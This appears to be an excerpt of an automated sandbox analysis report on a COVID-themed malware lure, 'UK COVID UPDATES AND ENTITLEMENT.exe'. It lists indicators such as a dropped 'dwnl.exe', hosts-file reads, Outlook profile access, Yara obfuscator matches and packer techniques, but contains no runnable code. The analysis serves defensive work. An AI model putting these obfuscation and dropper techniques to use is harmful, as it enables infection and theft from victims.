Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cldapi.pdb_6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000022.00000003.442720007.0000000003597000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: NapiNSP.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: NapiNSP.pdb^? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: WINMMBASE.pdbb?r source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbe6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000022.00000003.443176095.0000000003591000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbd?x source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: upwntdll.pdb(/ source: WerFault.exe, 00000022.00000003.442299112.0000000005532000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000022.00000003.442155176.000000000359D000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcp60.pdbR?" source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: wininet.pdb&?> source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: psapi.pdbL? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: nlaapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb=6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdbJ? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb;6I source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdb source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, dwnl.exe, dwnl.exe.28.dr
Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000022.00000003.443176095.0000000003591000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdbc6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: winmm.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbx?t source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: winrnr.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net35/Newtonsoft.Json.pdb source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdbv? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdbo6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net35/Newtonsoft.Json.pdbSHA256/ source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp
Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdbh} source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000000.430155447.0000000000822000.00000002.00020000.sdmp, dwnl.exe.28.dr
Source: Binary string: iertutil.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdbn?f source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: cldapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000022.00000003.442155176.000000000359D000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: winmm.pdb(?$ source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcp60.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000022.00000003.442720007.0000000003597000.00000004.00000001.sdmp
Source: Binary string: urlmon.pdb@? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: gdiplus.pdbT?( source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: edputil.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp

Data Obfuscation:

barindex
Yara detected Beds Obfuscator
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.dwnl.exe.842704.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.dwnl.exe.842704.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2fcf496.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.dwnl.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.dwnl.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2faeb92.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000000.430155447.0000000000822000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.492777549.0000000000822000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.464230298.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.424995684.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432421502.0000000002ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.464012145.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429908152.0000000002ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwnl.exe PID: 2896, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwnl.exe, type: DROPPED
.NET source code contains method to dynamically call methods (often used by packers)
Source: UK COVID UPDATES AND ENTITLEMENT.exe, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_00A381A4 push eax; iretd 0_2_00A381BF
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_014747E9 push es; ret 0_2_014747EF
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_0147479C push esi; ret 0_2_0147479F
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_07C13D01 push esi; ret 0_2_07C13D07
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_0813896E push cs; retf 0_2_0813896F
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_08135998 push eax; iretd 0_2_08135999
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 22_2_001881A4 push eax; iretd 22_2_001881BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 23_2_002281A4 push eax; iretd 23_2_002281BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 24_2_000A81A4 push eax; iretd 24_2_000A81BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 25_2_002381A4 push eax; iretd 25_2_002381BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 27_2_000E81A4 push eax; iretd 27_2_000E81BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040FCF0 push eax; ret 28_2_0040FD1E
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_006581A4 push eax; iretd 28_2_006581BF
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142CF30 push es; ret 33_2_0142CF40
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665EC58 pushad ; retf 33_2_0665ECAD
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress, 28_2_00407D38
Source: initial sample Static PE information: section name: .text entropy: 7.82377359476
Source: initial sample Static PE information: section name: .text entropy: 7.82377359476
Source: UK COVID UPDATES AND ENTITLEMENT.exe, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs High entropy of concatenated method names: '.cctor', 'TdY6t5IK5Mc4Q', 'hK65SCnqm1', 'Tfe5lO1BYF', 'WfQ5LBQWgc', 'bJP5QM1519', 'XGl5819WXH', 't535jZAwjI', 'tXd5yMQqed', 'kC15VuKHBh'
Source: UK COVID UPDATES AND ENTITLEMENT.exe, FWysowXedcGlC7xsw8/DdMQqerdCC1uKHBh4e.cs High entropy of concatenated method names: 'UxGq2Xf85S', 'SAjqEko3mB', 'FSXqeN2cKj', '.ctor', 'QZEPIYgu3mLK6', '.cctor', 'OBMkI277SC1PCLgB71', 'DgcyhxOmSYwcQU2VWx', 'D3kJx6t22qIADH53FD', 'oPgdmdhGeJ67WJdrSg'
Source: UK COVID UPDATES AND ENTITLEMENT.exe, UKCRYPTED.Lists/BridgeOrderList.cs High entropy of concatenated method names: '.ctor', 'vuwW3qTka', 'oeWgHhCDa', 'C5r3Dhemg', 'xK07h1B1Q', 'juDJOq9nn', 'SkZsNtK48', 'WGvZRDFvv85ifBdlXV', 'Ty64C47LtjIbP79QHn', 'XxFH2OuwUxmcU0t1hq'
Source: UK COVID UPDATES AND ENTITLEMENT.exe, UKCRYPTED.Objects/ConfigurationInitializerObject.cs High entropy of concatenated method names: '.ctor', 'cn8DCltlx', 'F9VP4dCs3', 'Dispose', 'CueOFqteW', 'vQXTtwAQ5', 'xmem6gFTB', 'GLttTIXfI', 'Tla1xIYiC', 'ocjiNtwMs'
Source: UK COVID UPDATES AND ENTITLEMENT.exe, UKCRYPTED.Objects/Database.cs High entropy of concatenated method names: 'RestartProcess', 'T2cj09F9o', 'z26yp2wWo', 'TQNVVK8Fu', 'bZHZMDaFh', 'UGpCdZt7V', 'DEsGynkIC', 'JmkBrSm5B', 'v6hMPXHmd', 'iqHqd3DlKKl2G4t9gO'
Source: UK COVID UPDATES AND ENTITLEMENT.exe, P18ALnjf71qn8Cltlx/QCkmkr8Sm5Bh6hPXHm.cs High entropy of concatenated method names: '.ctor', 'cTJnbWPpY', 'MLAYocyxW', 'qNjbOvSTg', 'johdOOb56', 'gYwIwfEhN', 'NuaxrPqRd', 'QxO6VY7xf', 'RasAjmwXW', 'qTJU5QaHr'
Source: UK COVID UPDATES AND ENTITLEMENT.exe, fXtwAQV5gme6gFTBeL/F9V4dCys3rueFqteWh.cs High entropy of concatenated method names: 'TgQ6t5IIcpB79', '.ctor', '.cctor', 'inuu2kABFtK0ghnyINo', 'zJP6gMA2D7HZh0wOHd1', 'Ep2oYXACBA99he2ZeEN', 'a4QYbmA4d9cdllwPB4L', 'T3eOqyAJoh4KBYQtqjb', 'Nytk3wApvTD33HCsiVH', 'TNKjLUASZ2ok42ny1Js'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs High entropy of concatenated method names: '.cctor', 'TdY6t5IK5Mc4Q', 'hK65SCnqm1', 'Tfe5lO1BYF', 'WfQ5LBQWgc', 'bJP5QM1519', 'XGl5819WXH', 't535jZAwjI', 'tXd5yMQqed', 'kC15VuKHBh'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, FWysowXedcGlC7xsw8/DdMQqerdCC1uKHBh4e.cs High entropy of concatenated method names: 'UxGq2Xf85S', 'SAjqEko3mB', 'FSXqeN2cKj', '.ctor', 'QZEPIYgu3mLK6', '.cctor', 'OBMkI277SC1PCLgB71', 'DgcyhxOmSYwcQU2VWx', 'D3kJx6t22qIADH53FD', 'oPgdmdhGeJ67WJdrSg'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, UKCRYPTED.Lists/BridgeOrderList.cs High entropy of concatenated method names: '.ctor', 'vuwW3qTka', 'oeWgHhCDa', 'C5r3Dhemg', 'xK07h1B1Q', 'juDJOq9nn', 'SkZsNtK48', 'WGvZRDFvv85ifBdlXV', 'Ty64C47LtjIbP79QHn', 'XxFH2OuwUxmcU0t1hq'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, UKCRYPTED.Objects/Database.cs High entropy of concatenated method names: 'RestartProcess', 'T2cj09F9o', 'z26yp2wWo', 'TQNVVK8Fu', 'bZHZMDaFh', 'UGpCdZt7V', 'DEsGynkIC', 'JmkBrSm5B', 'v6hMPXHmd', 'iqHqd3DlKKl2G4t9gO'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, UKCRYPTED.Objects/ConfigurationInitializerObject.cs High entropy of concatenated method names: '.ctor', 'cn8DCltlx', 'F9VP4dCs3', 'Dispose', 'CueOFqteW', 'vQXTtwAQ5', 'xmem6gFTB', 'GLttTIXfI', 'Tla1xIYiC', 'ocjiNtwMs'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, P18ALnjf71qn8Cltlx/QCkmkr8Sm5Bh6hPXHm.cs High entropy of concatenated method names: '.ctor', 'cTJnbWPpY', 'MLAYocyxW', 'qNjbOvSTg', 'johdOOb56', 'gYwIwfEhN', 'NuaxrPqRd', 'QxO6VY7xf', 'RasAjmwXW', 'qTJU5QaHr'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, fXtwAQV5gme6gFTBeL/F9V4dCys3rueFqteWh.cs High entropy of concatenated method names: 'TgQ6t5IIcpB79', '.ctor', '.cctor', 'inuu2kABFtK0ghnyINo', 'zJP6gMA2D7HZh0wOHd1', 'Ep2oYXACBA99he2ZeEN', 'a4QYbmA4d9cdllwPB4L', 'T3eOqyAJoh4KBYQtqjb', 'Nytk3wApvTD33HCsiVH', 'TNKjLUASZ2ok42ny1Js'
